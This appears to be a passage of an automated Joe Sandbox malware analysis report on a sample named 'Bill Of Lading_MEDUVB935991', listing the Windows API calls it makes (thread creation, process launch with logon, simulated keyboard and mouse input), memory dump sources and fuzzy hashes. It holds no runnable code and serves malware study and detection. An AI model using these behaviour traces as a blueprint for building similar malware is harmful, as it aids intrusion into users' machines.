                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1269668773-0
                                                                                                                      • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                      • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                      • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                      • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                        • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                      • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                      • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                      • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                      • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                      • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4166825349-0
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                      • API String ID: 2574300362-3261711971
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                      • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3220332590-0
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1612042205-0
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                      • SendInput.USER32 ref: 0044C6E2
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2221674350-0
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2037614760-0
                                                                                                                      APIs
                                                                                                                      • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                      • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                      Similarity
                                                                                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4189319755-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
• EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
• LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID:
• API String ID: 1726766782-0
• Opcode ID: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
• Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
• Opcode Fuzzy Hash: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
• Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
APIs
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
• EnableWindow.USER32(?,00000000), ref: 0044111A
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
• ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
• EnableWindow.USER32(?,00000001), ref: 004411B3
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
• Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
APIs
• SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
• SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
• InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
• GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
• Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
APIs
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• GetWindowRect.USER32(00000000), ref: 004425C6
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• GetCursorPos.USER32(?), ref: 00442624
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
• Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
• Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
• Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$Enable$Show$MessageSend
• String ID:
• API String ID: 1871949834-0
• Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
• Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
APIs
• _memset.LIBCMT ref: 0044961A
• SendMessageW.USER32 ref: 0044964A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
• _wcslen.LIBCMT ref: 004496BA
• _wcslen.LIBCMT ref: 004496C7
• SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1624073603-0
• Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
• Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
• Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
• Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
• Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
• Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
• Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
• Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
• Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __fileno__setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 3354276064-0
• Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
• Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
• Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
• Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Destroy$DeleteMenuObject$IconWindow
• String ID:
• API String ID: 752480666-0
• Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
• Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
• Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
• Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
APIs
• DestroyWindow.USER32(00000000), ref: 0045527A
• ImageList_Destroy.COMCTL32(?), ref: 0045528C
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
• Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
• Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
• Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
APIs
• GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
• OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
• CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
• CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
• DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
• Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
• Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
• Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
APIs
• ___set_flsgetvalue.LIBCMT ref: 0041418F
• __calloc_crt.LIBCMT ref: 0041419B
• __getptd.LIBCMT ref: 004141A8
• CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
• __dosmaperr.LIBCMT ref: 00414201
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
